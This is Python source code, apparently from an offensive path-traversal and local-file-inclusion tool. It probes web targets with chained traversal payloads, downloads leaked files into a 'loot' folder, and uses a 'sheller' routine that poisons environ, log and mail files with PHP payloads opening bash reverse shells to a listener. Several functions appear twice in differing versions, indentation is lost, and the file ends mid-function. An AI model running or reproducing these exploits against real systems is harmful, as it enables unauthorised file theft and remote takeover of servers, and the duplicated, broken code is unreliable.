def getCookie(url):
s = session()
try:
s.get(url, timeout=timeout)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError):
sys.exit("Timeout fetching cookie.")
return s.cookies
def check_version():
"""
compare local version with online version
"""
try:
s = session()
onver = s.get(
"https://raw.githubusercontent.com/VainlyStrain"
"/Vailyn/master/core/doc/VERSION",
timeout=2,
).text.strip()
localmain = e_version.split("-")[0]
localrev = e_version.split("-")[1]
locallist = localmain.split(".")
onmain = onver.split("-")[0]
onrev = onver.split("-")[1]
onlist = onmain.split(".")
uptodate = True
matches = True
for i in range(0, len(locallist)):
if int(locallist[i]) < int(onlist[i]):
uptodate = False
for i in range(0, len(locallist)):
if int(locallist[i]) != int(onlist[i]):
matches = False
if uptodate and matches:
if int(localrev) < int(onrev):
uptodate = False
return uptodate
except Exception:
return True
def download(url, file, cookie=None, post=None):
"""
download found files & save them in the loot folder
@params:
url - URL to be downloaded from.
file - file name. (with path)
cookie - cookie to be used.
post - should we do a POST request? (default: GET)
"""
s = session()
if cookie:
s.cookies = cookie
url_separator = "/"
if "\\" in file:
url_separator = "\\"
path = SEPARATOR.join(file.split(url_separator)[0:-1])
base_url = url.split("://")[1]
name = base_url.split(url_separator)[0]
# fixes directory issues on Windows, because it doesn't
# allow the character :, which is used in URIs
if "@" in name:
name = name.split("@")[1]
name = name.split(":")[0]
subdir = name + "-" + str(date) + SEPARATOR
if not os.path.exists(variables.lootdir + subdir + path):
os.makedirs(variables.lootdir + subdir + path)
with open((variables.lootdir + subdir + file), "wb") as loot:
if not post:
try:
response = s.get(url, timeout=variables.timeout)
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError,
):
print("Timeout reached looting " + url)
return
else:
try:
req = requests.Request(method="POST", url=url, data=post)
prep = s.prepare_request(req)
new_body = unquote(prep.body)
prep.body = new_body
prep.headers["content-length"] = len(new_body)
response = s.send(prep, timeout=variables.timeout)
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError,
):
print("Timeout reached looting " + url)
return
loot.write(response.content)
loot.close()
print("{}[LOOT]{} {}".format(color.RD, color.END + color.O + color.CURSIVE,
file + color.END))
def download(url, file, cookie=None, post=None):
s = session()
if cookie:
s.cookies = cookie
if sys.platform.lower().startswith('win'):
if "\\" in file:
path = '\\'.join(file.split('\\')[0:-1])
baseurl = url.split("://")[1]
name = baseurl.split("\\")[0]
else:
path = '\\'.join(file.split('/')[0:-1])
baseurl = url.split("://")[1]
name = baseurl.split("/")[0]
#fixes directory issues on Windows, because it doesn't allow the character :, which is used in URIs
if "@" in name:
name = name.split("@")[1]
name = name.split(":")[0]
subdir = name + "-" + str(date) + "\\"
else:
if "\\" in file:
path = '/'.join(file.split('\\')[0:-1])
baseurl = url.split("://")[1]
name = baseurl.split("\\")[0]
else:
path = '/'.join(file.split('/')[0:-1])
baseurl = url.split("://")[1]
name = baseurl.split("/")[0]
if "@" in name:
name = name.split("@")[1]
name = name.split(":")[0]
subdir = name + "-" + str(date) + "/"
if not os.path.exists(variables.lootdir + subdir + path):
os.makedirs(variables.lootdir + subdir + path)
with open((variables.lootdir + subdir + file), "wb") as loot:
if not post:
try:
response = s.get(url, timeout=variables.timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached looting " + url)
return
else:
try:
response = s.post(url, data=post, timeout=variables.timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached looting " + url)
return
loot.write(response.content)
loot.close()
print('{}[LOOT]{} {}'.format(color.RD, color.END + color.O + color.CURSIVE,
file + color.END))
def getCookie(url):
"""
fetches cookies from the website for the cookie attack
@params:
url - URL to fetch cookies from.
"""
s = session()
try:
s.get(url, timeout=timeout)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError):
sys.exit("Timeout fetching cookie.")
return s.cookies
def fetch_cookie(url, auth_cookie=""):
"""
fetches cookies from the website for the cookie attack
@params:
url - URL to fetch cookies from.
"""
s = session()
if auth_cookie:
requests.utils.add_dict_to_cookiejar(
s.cookies,
dict_from_header(auth_cookie),
)
try:
s.get(url, timeout=timeout)
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError,
):
sys.exit("Timeout fetching cookie.")
return s.cookies
def phase1(attack, url, url2, keyword, cookie, selected, verbose, depth,
paylist, file, authcookie, postdata, gui):
#variables for the progress counter
global requestcount
#totalrequests = len(paylist) * (len(nullchars) + 1) * depth
totalrequests = len(payloadlist) * (len(nullchars) + 1) * (depth)
timeout = vars.timeout
if gui:
lock.acquire()
try:
gui.progressBar.reset()
gui.progressBar.setMinimum(0)
gui.progressBar.setMaximum(totalrequests)
finally:
lock.release()
#resolve issues with inpath attack
if not url.endswith("/"):
url += "/"
#initialize lists & session
payloads = []
nullbytes = []
s = session()
if authcookie != "":
tmpjar = cookieFromFile(authcookie)
for cookie in tmpjar:
s.cookies.set_cookie(cookie)
#initial ping for filecheck
if attack != 4:
try:
con2 = s.get(url, timeout=timeout).content
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
sys.exit("Timeout on initial check.")
else:
try:
con2 = s.post(url, data={}, timeout=timeout).content
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
sys.exit("Timeout on initial check.")
con3 = None
if attack == 1:
try:
con3 = s.get(url + "?" + keyword + "=vailyn" + url2,
timeout=timeout).content
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
sys.exit("Timeout on initial check.")
for i in paylist:
d = 1
while d <= depth:
traverse = ''
j = 1
#chain traversal payloads
while j <= d:
traverse += i
j += 1
#send attack requests - no nullbyte injection
requestlist = []
if attack == 1:
prep, p = query(traverse, "", file, "", keyword, url, url2, s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 2:
prep, p = inpath(traverse, "", file, "", url, url2, s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 3:
s.cookies.set(selected, traverse + file)
p = traverse + file
try:
random_ua(s)
r = s.get(url, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 4:
p = traverse + file
data = {}
for prop in postdata.split("&"):
pair = prop.split("=")
if pair[1].strip() == "INJECT":
pair[1] = p
data[pair[0].strip()] = pair[1].strip()
assert data != {}
try:
random_ua(s)
r = s.post(url, data=data, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
requestlist.append((r, p, ""))
#repeat for nullbytes
for nb in nullchars:
if attack == 1:
prep, p = query(traverse, "", file, nb, keyword, url, url2,
s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 2:
prep, p = inpath(traverse, "", file, nb, url, url2, s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 3:
s.cookies.set(selected, traverse + file + nb)
p = traverse + file + nb
try:
random_ua(s)
r = s.get(url, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 4:
p = traverse + file + nb
data = {}
for prop in postdata.split("&"):
pair = prop.split("=")
if pair[1].strip() == "INJECT":
pair[1] = p
data[pair[0].strip()] = pair[1].strip()
assert data != {}
try:
random_ua(s)
r = s.post(url, data=data, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
requestlist.append((r, p, nb))
#analyze result
found = False
for (r, p, nb) in requestlist:
lock.acquire()
try:
requestcount += 1
if gui:
progressgui(requestcount, totalrequests, gui)
else:
if sys.platform.lower().startswith('win'):
if requestcount % 1000 == 0:
progresswin(requestcount,
totalrequests,
prefix=" ",
suffix=" ")
else:
progress(requestcount,
totalrequests,
prefix=" ",
suffix=" ")
finally:
lock.release()
if str(r.status_code).startswith("2"):
if filecheck(
r, con2, con3, p) and attack != 4 or filecheck(
r, con2, con3, p, post=True) and attack == 4:
payloads.append(i)
if nb != "":
nullbytes.append(nb)
found = True
out = color.RD + "[pl]" + color.END + color.O + " " + str(
r.status_code) + color.END + " "
out = out + "{0:{1}}".format(i, maxlen) + " " + nb
print(out)
if verbose and not found:
if attack == 1 or attack == 2:
print(color.END + "{}|: ".format(r.status_code) +
r.url)
elif attack == 3 or attack == 4:
print(color.END + "{}|: ".format(r.status_code) +
r.url + " : " + p)
d += 1
if found:
break
return (payloads, nullbytes)
def sheller(technique, attack, url, url2, keyword, cookie, selected, verbose,
paylist, nullist, authcookie, postdata):
#resolve issues with inpath attack
if not url.endswith("/"):
url += "/"
s = session()
timeout = vars.timeout
depth = 10
if technique == 1:
file = "/proc/self/environ"
elif technique == 2:
file = "/var/log/apache2/access.log"
elif technique == 3:
file = "/var/log/auth.log"
elif technique == 4:
file = "/var/mail/www-data"
success = None
if authcookie != "":
tmpjar = cookieFromFile(authcookie)
for cookie in tmpjar:
s.cookies.set_cookie(cookie)
#initial ping for filecheck
if attack != 4:
try:
con2 = s.get(url, timeout=timeout).content
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
sys.exit("Timeout on initial check.")
else:
try:
con2 = s.post(url, data={}, timeout=timeout).content
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
sys.exit("Timeout on initial check.")
con3 = None
if attack == 1:
try:
con3 = s.get(url + "?" + keyword + "=vailyn" + url2,
timeout=timeout).content
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
sys.exit("Timeout on initial check.")
for i in paylist:
d = 1
while d <= depth:
traverse = ''
j = 1
#chain traversal payloads
while j <= d:
traverse += i
j += 1
#send attack requests - no nullbyte injection
requestlist = []
if nullist == []:
data = {}
if attack == 1:
prep, p = query(traverse, "", file, "", keyword, url, url2,
s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 2:
prep, p = inpath(traverse, "", file, "", url, url2, s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 3:
s.cookies.set(selected, traverse + file)
p = traverse + file
try:
random_ua(s)
r = s.get(url, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 4:
p = traverse + file
for prop in postdata.split("&"):
pair = prop.split("=")
if pair[1].strip() == "INJECT":
pair[1] = p
data[pair[0].strip()] = pair[1].strip()
assert data != {}
try:
random_ua(s)
r = s.post(url, data=data, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
requestlist.append((r, p, "", data, traverse))
else:
for nb in nullist:
data = {}
if attack == 1:
prep, p = query(traverse, "", file, "", keyword, url,
url2, s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 2:
prep, p = inpath(traverse, "", file, "", url, url2, s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 3:
s.cookies.set(selected, traverse + file)
p = traverse + file
try:
random_ua(s)
r = s.get(url, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 4:
p = traverse + file
for prop in postdata.split("&"):
pair = prop.split("=")
if pair[1].strip() == "INJECT":
pair[1] = p
data[pair[0].strip()] = pair[1].strip()
assert data != {}
try:
random_ua(s)
r = s.post(url, data=data, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
requestlist.append((r, p, "", data, traverse))
#analyze result
found = False
for (r, p, nb, data, traverse) in requestlist:
if attack == 3:
s.cookies.set(selected, p)
if str(r.status_code).startswith("2"):
if filecheck(
r, con2, con3, p) and attack != 4 or filecheck(
r, con2, con3, p, post=True) and attack == 4:
success = (r, p, nb, data, traverse)
found = True
break
if verbose:
if attack == 1 or attack == 2:
print(color.END + "{}|: ".format(r.status_code) +
r.url)
elif attack == 3 or attack == 4:
print(color.END + "{}|: ".format(r.status_code) +
r.url + " : " + p)
d += 1
if found:
break
if success:
if attack == 1:
prep = query(success[4], "", file, success[2], keyword, url, url2,
s)[0]
elif attack == 2:
prep = inpath(success[4], "", file, success[2], url, url2, s)[0]
elif attack == 3:
s.cookies.set(selected, success[1])
req = requests.Request(method='GET', url=url)
prep = s.prepare_request(req)
elif attack == 4:
req = requests.Request(method='POST', url=url, data=success[3])
prep = s.prepare_request(req)
if technique == 1:
prep.headers[
'User-agent'] = '<?php system("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>'.format(
LISTENIP, LISTENPORT)
try:
s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached @technique 1")
prep.headers[
'User-agent'] = '<?php exec("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>'.format(
LISTENIP, LISTENPORT)
try:
s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached @technique 1")
prep.headers[
'User-agent'] = '<?php passthru("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>'.format(
LISTENIP, LISTENPORT)
try:
s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached @technique 1")
elif technique == 2:
req = requests.Request(method='GET', url=url)
prep2 = s.prepare_request(req)
prep2.url = url + "/" + '<?php system("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>'.format(
LISTENIP, LISTENPORT)
try:
s.send(prep2, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached @technique 2")
prep2.url = url + "/" + '<?php exec("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>'.format(
LISTENIP, LISTENPORT)
try:
s.send(prep2, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached @technique 2")
prep2.url = url + "/" + '<?php passthru("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>'.format(
LISTENIP, LISTENPORT)
try:
s.send(prep2, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached @technique 2")
try:
s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached @technique 2")
elif technique == 3:
tmp = url.split("://")[1]
if "@" in tmp:
tmp = tmp.split("@")[1]
host = tmp.split("/")[0].split(":")[0]
sshs = [
'<?php system("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>@{}'.format(
LISTENIP, LISTENPORT, host),
'<?php exec("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>@{}'.format(
LISTENIP, LISTENPORT, host),
'<?php passthru("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>@{}'.
format(LISTENIP, LISTENPORT, host)
]
for ssh in sshs:
try:
if sys.platform.lower().startswith("win"):
subprocess.run(["putty.exe", "-ssh", ssh])
else:
subprocess.run(["ssh", ssh])
except Exception as e:
print("Technique " + technique + " failed: {}".format(e))
try:
s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached @technique 3")
elif technique == 4:
tmp = url.split("://")[1]
if "@" in tmp:
tmp = tmp.split("@")[1]
topics = [
'I<3shells <?php system("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>'.
format(LISTENIP, LISTENPORT),
'I<3shells <?php exec("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>'.
format(LISTENIP, LISTENPORT),
'I<3shells <?php passthru("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>'
.format(LISTENIP, LISTENPORT)
]
host = tmp.split("/")[0].split(":")[0]
for topic in topics:
try:
p = subprocess.Popen(["echo", "Uno reverse shell"],
stdout=subprocess.PIPE)
subprocess.call(
["mail", "-s", topic, "www-data@{}".format(host)],
stdin=p.stdout)
except Exception as e:
print("Technique " + technique + " failed: {}".format(e))
try:
s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached @technique 4")
def phase2(attack, url, url2, keyword, cookie, selected, filespath, dirs,
depth, verbose, dl, selected_payloads, selected_nullbytes,
authcookie, postdata, dirlen, gui):
#variables for the progress counter
global requestcount
timeout = vars.timeout
fileslen = sum(1 for dummy in filegen(filespath))
if len(selected_nullbytes) == 0:
totalrequests = len(selected_payloads) * fileslen * dirlen * depth
else:
totalrequests = len(selected_payloads) * len(
selected_nullbytes) * fileslen * dirlen * depth
if gui:
lock.acquire()
try:
gui.progressBar.reset()
gui.progressBar.setMinimum(0)
gui.progressBar.setMaximum(totalrequests)
finally:
lock.release()
#resolve issues with inpath attack and loot function
if not url.endswith("/"):
url += "/"
#initialize lists & session
found = []
urls = []
s = session()
if authcookie != "":
tmpjar = cookieFromFile(authcookie)
for cookie in tmpjar:
s.cookies.set_cookie(cookie)
#initial ping for filecheck
if attack != 4:
try:
con2 = s.get(url, timeout=timeout).content
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
sys.exit("Timeout on initial check.")
else:
try:
con2 = s.post(url, data={}, timeout=timeout).content
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
sys.exit("Timeout on initial check.")
con3 = None
if attack == 1:
try:
con3 = s.get(url + "?" + keyword + "=vailyn" + url2,
timeout=timeout).content
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
sys.exit("Timeout on initial check.")
try:
for dir in dirs:
files = filegen(filespath)
for file in files:
d = 1
while d <= depth:
for i in selected_payloads:
traverse = ''
j = 1
#chain traversal payloads
while j <= d:
traverse += i
j += 1
#send attack requests - with or without nullbyte injection
requestlist = []
if selected_nullbytes == []:
data = {}
if attack == 1:
prep, p = query(traverse, dir, file, "",
keyword, url, url2, s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 2:
prep, p = inpath(traverse, dir, file, "", url,
url2, s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 3:
p = traverse + dir + file
s.cookies.set(selected, traverse + dir + file)
try:
random_ua(s)
r = s.get(url, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
#print(s.cookies)
elif attack == 4:
p = traverse + dir + file
for prop in postdata.split("&"):
pair = prop.split("=")
if pair[1].strip() == "INJECT":
pair[1] = p
data[pair[0].strip()] = pair[1].strip()
assert data != {}
try:
random_ua(s)
r = s.post(url, data=data, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
requestlist.append((r, p, data))
else:
for nb in selected_nullbytes:
data = {}
if attack == 1:
prep, p = query(traverse, dir, file, nb,
keyword, url, url2, s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError
):
print("Timeout reached for " + url)
continue
elif attack == 2:
prep, p = inpath(traverse, dir, file, nb,
url, url2, s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError
):
print("Timeout reached for " + url)
continue
elif attack == 3:
p = traverse + dir + file + nb
s.cookies.set(selected,
traverse + dir + file + nb)
try:
random_ua(s)
r = s.get(url, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError
):
print("Timeout reached for " + url)
continue
elif attack == 4:
p = traverse + dir + file + nb
for prop in postdata.split("&"):
pair = prop.split("=")
if pair[1].strip() == "INJECT":
pair[1] = p
data[pair[0].strip()] = pair[1].strip()
assert data != {}
try:
random_ua(s)
r = s.post(url,
data=data,
timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError
):
print("Timeout reached for " + url)
continue
requestlist.append((r, p, data))
#analyze result
for (r, p, data) in requestlist:
lock.acquire()
try:
requestcount += 1
if gui:
progressgui(requestcount, totalrequests,
gui)
else:
if sys.platform.lower().startswith('win'):
if requestcount % 1000 == 0:
progresswin(requestcount,
totalrequests,
prefix=" ",
suffix=" ")
else:
progress(requestcount,
totalrequests,
prefix=" ",
suffix=" ")
finally:
lock.release()
vfound = False
if str(r.status_code).startswith("2"):
if filecheck(r, con2, con3,
p) and attack != 4 or filecheck(
r, con2, con3, p,
post=True) and attack == 4:
vfound = True
if attack == 1 or attack == 2:
print(color.RD + "[INFO]" + color.O +
" leak" + color.END + " " +
color.RD + "statvs-code" +
color.END + "=" + color.O +
str(r.status_code) + color.END +
" " + color.R + "site" +
color.END + "=" + r.url)
if dl and dir + file not in found:
download(r.url,
dir + file,
cookie=s.cookies)
found.append(dir + file)
if attack == 1:
urls.append(color.RD + "[pl]" +
color.END + color.O +
" " +
str(r.status_code) +
color.END + " " +
r.url.split(keyword +
"=")
[1].replace(url2, ""))
else:
vlnlist = r.url.split("/")[1::]
vlnpath = ("/".join(
i for i in vlnlist)).replace(
url2, "")
urls.append(color.RD + "[pl]" +
color.END + color.O +
" " +
str(r.status_code) +
color.END + " " +
vlnpath)
elif attack == 3:
s.cookies.set(selected, p)
print(color.RD + "[INFO]" + color.O +
" leak" + color.END + " " +
color.RD + "statvs-code" +
color.END + "=" + color.O +
str(r.status_code) + color.END +
" " + color.R + "cookie" +
color.END + "=" + p)
if dl and dir + file not in found:
download(r.url,
dir + file,
cookie=s.cookies)
found.append(dir + file)
urls.append(color.RD + "[pl]" +
color.END + color.O + " " +
str(r.status_code) +
color.END + " " + p)
elif attack == 4:
print(color.RD + "[INFO]" + color.O +
" leak" + color.END + " " +
color.RD + "statvs-code" +
color.END + "=" + color.O +
str(r.status_code) + color.END +
" " + color.R + "postdata" +
color.END + "=" + p)
if dl and dir + file not in found:
download(r.url,
dir + file,
cookie=s.cookies,
post=data)
found.append(dir + file)
urls.append(color.RD + "[pl]" +
color.END + color.O + " " +
str(r.status_code) +
color.END + " " + p)
if verbose and not vfound:
if attack == 1 or attack == 2:
print(color.END +
"{}|: ".format(r.status_code) +
r.url)
elif attack == 3 or attack == 4:
print(color.END +
"{}|: ".format(r.status_code) +
r.url + " : " + p)
d += 1
return (found, urls)
except KeyboardInterrupt:
return (found, urls)
def phase1(attack, url, url2, keyword, cookie, selected, verbose, depth,
paylist, file, authcookie, postdata, gui):
"""
[Phase 1]: Vulnerability Analysis
@params:
attack - attack mode (-a ACK)
url - target part 1 (-v VIC)
url2 - target part 2 (-q VIC2)
keyword - -p PAM (only for -a 1)
cookie - cookiejar for -a 3
selected - selected cookie to be poisoned
verbose - print 404s?
depth - attack depth (-d INT)
paylist - payload list (all)
file - file to be looked up (-i FIL, default: /etc/passwd)
authcookie - Authentication Cookie File to bypass Login Screens
postdata - POST Data for --attack 4
gui - GUI frame to set the graphical progress bar
"""
# variables for the progress counter
global requestcount
totalrequests = len(payloadlist) * (len(nullchars) + 1) * (depth)
timeout = vars.timeout
if gui:
lock.acquire()
try:
gui.progressBar.reset()
gui.progressBar.setMinimum(0)
gui.progressBar.setMaximum(totalrequests)
finally:
lock.release()
# resolve issues with inpath attack
if attack == 2:
# only root directory, else false positives
splitted = url.split("://")
ulist = splitted[1].split("/")
last = ulist[-1]
# delete file, but not hidden directory
if "." in last and not last.startswith(".") and last != ulist[0]:
del ulist[-1]
url = splitted[0] + "://" + "/".join(ulist)
if not url.endswith("/"):
url += "/"
# initialize lists & session
payloads = []
nullbytes = []
s = session()
if authcookie != "":
tmpjar = cookieFromFile(authcookie)
for cookie in tmpjar:
s.cookies.set_cookie(cookie)
# initial ping for filecheck
if attack != 4:
try:
con2 = s.get(url, timeout=timeout).content
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
sys.exit("Timeout on initial check.")
else:
try:
con2 = s.post(url, data={}, timeout=timeout).content
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
sys.exit("Timeout on initial check.")
con3 = None
if attack == 1:
try:
con3 = s.get(url + "?" + keyword + "=vailyn" + url2,
timeout=timeout).content
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
sys.exit("Timeout on initial check.")
for i in paylist:
d = 1
while d <= depth:
traverse = ''
j = 1
# chain traversal payloads
while j <= d:
traverse += i
j += 1
# send attack requests - no nullbyte injection
requestlist = []
if attack == 1:
prep, p = query(traverse, "", file, "", keyword, url, url2, s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
elif attack == 2:
prep, p = inpath(traverse, "", file, "", url, url2, s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
elif attack == 3:
s.cookies.set(selected, traverse + file)
p = traverse + file
try:
random_ua(s)
r = s.get(url, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
elif attack == 4:
p = traverse + file
data = {}
for prop in postdata.split("&"):
pair = prop.split("=")
if pair[1].strip() == "INJECT":
pair[1] = p
data[pair[0].strip()] = pair[1].strip()
assert data != {}
try:
random_ua(s)
req = requests.Request(method='POST', url=url, data=data)
prep = s.prepare_request(req)
newBody = unquote(prep.body)
prep.body = newBody
prep.headers["content-length"] = len(newBody)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
try:
requestlist.append((r, p, ""))
except Exception:
pass
# repeat for nullbytes
for nb in nullchars:
if attack == 1:
prep, p = query(traverse, "", file, nb, keyword, url, url2,
s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 2:
prep, p = inpath(traverse, "", file, nb, url, url2, s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 3:
s.cookies.set(selected, traverse + file + nb)
p = traverse + file + nb
try:
random_ua(s)
r = s.get(url, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 4:
p = traverse + file + nb
data = {}
for prop in postdata.split("&"):
pair = prop.split("=")
if pair[1].strip() == "INJECT":
pair[1] = p
data[pair[0].strip()] = pair[1].strip()
assert data != {}
try:
random_ua(s)
req = requests.Request(method='POST',
url=url,
data=data)
prep = s.prepare_request(req)
newBody = unquote(prep.body)
prep.body = newBody
prep.headers["content-length"] = len(newBody)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
try:
requestlist.append((r, p, nb))
except Exception:
pass
# analyze result
found = False
for (r, p, nb) in requestlist:
lock.acquire()
try:
requestcount += 1
if gui:
progressgui(requestcount, totalrequests, gui)
else:
if sys.platform.lower().startswith('win'):
if requestcount % 1000 == 0:
progresswin(requestcount,
totalrequests,
prefix=" ",
suffix=" ")
else:
progress(requestcount,
totalrequests,
prefix=" ",
suffix=" ")
finally:
lock.release()
if str(r.status_code).startswith("2"):
if filecheck(
r, con2, con3, p) and attack != 4 or filecheck(
r, con2, con3, p, post=True) and attack == 4:
payloads.append(i)
if nb != "":
nullbytes.append(nb)
found = True
out = color.RD + "[pl]" + color.END + color.O + " " + str(
r.status_code) + color.END + " "
out = out + "{0:{1}}".format(i, maxlen) + " " + nb
print(out)
if verbose and not found:
if attack == 1 or attack == 2:
print(color.END + "{}|: ".format(r.status_code) +
r.url)
elif attack == 3 or attack == 4:
print(color.END + "{}|: ".format(r.status_code) +
r.url + " : " + p)
d += 1
if found:
break
return (payloads, nullbytes)
def phase2(attack, url, url2, keyword, cookie, selected, filespath, dirs,
depth, verbose, dl, selected_payloads, selected_nullbytes,
authcookie, postdata, dirlen, gui):
"""
[Phase 2]: Exploitation
@params:
attack - attack mode (-a ACK)
url - target part 1 (-v VIC)
url2 - target part 2 (-q VIC2)
keyword - -p PAM (only for -a 1)
cookie - cookiejar for -a 3
selected - selected cookie to be poisoned
files - file list created from -l FIL ...
dirs - directory list (permutation level based on -d INT)
depth - attack depth (-d INT)
verbose - print 404s?
dl - download found files?
selected_payloads - payloads selected in phase 1
selected_nullbytes - terminators selected in phase 1
authcookie - Authentication Cookie File to bypass Login Screens
postdata - POST Data for --attack 4
dirlen - total directory dictionary size (after permutations)
gui - GUI frame to set the graphical progress bar
"""
# variables for the progress counter
global requestcount
timeout = vars.timeout
fileslen = sum(1 for dummy in filegen(filespath))
if len(selected_nullbytes) == 0:
totalrequests = len(selected_payloads) * fileslen * dirlen * depth
else:
totalrequests = len(selected_payloads) * len(
selected_nullbytes) * fileslen * dirlen * depth
if gui:
lock.acquire()
try:
gui.progressBar.reset()
gui.progressBar.setMinimum(0)
gui.progressBar.setMaximum(totalrequests)
finally:
lock.release()
# resolve issues with inpath attack and loot function
if attack == 2:
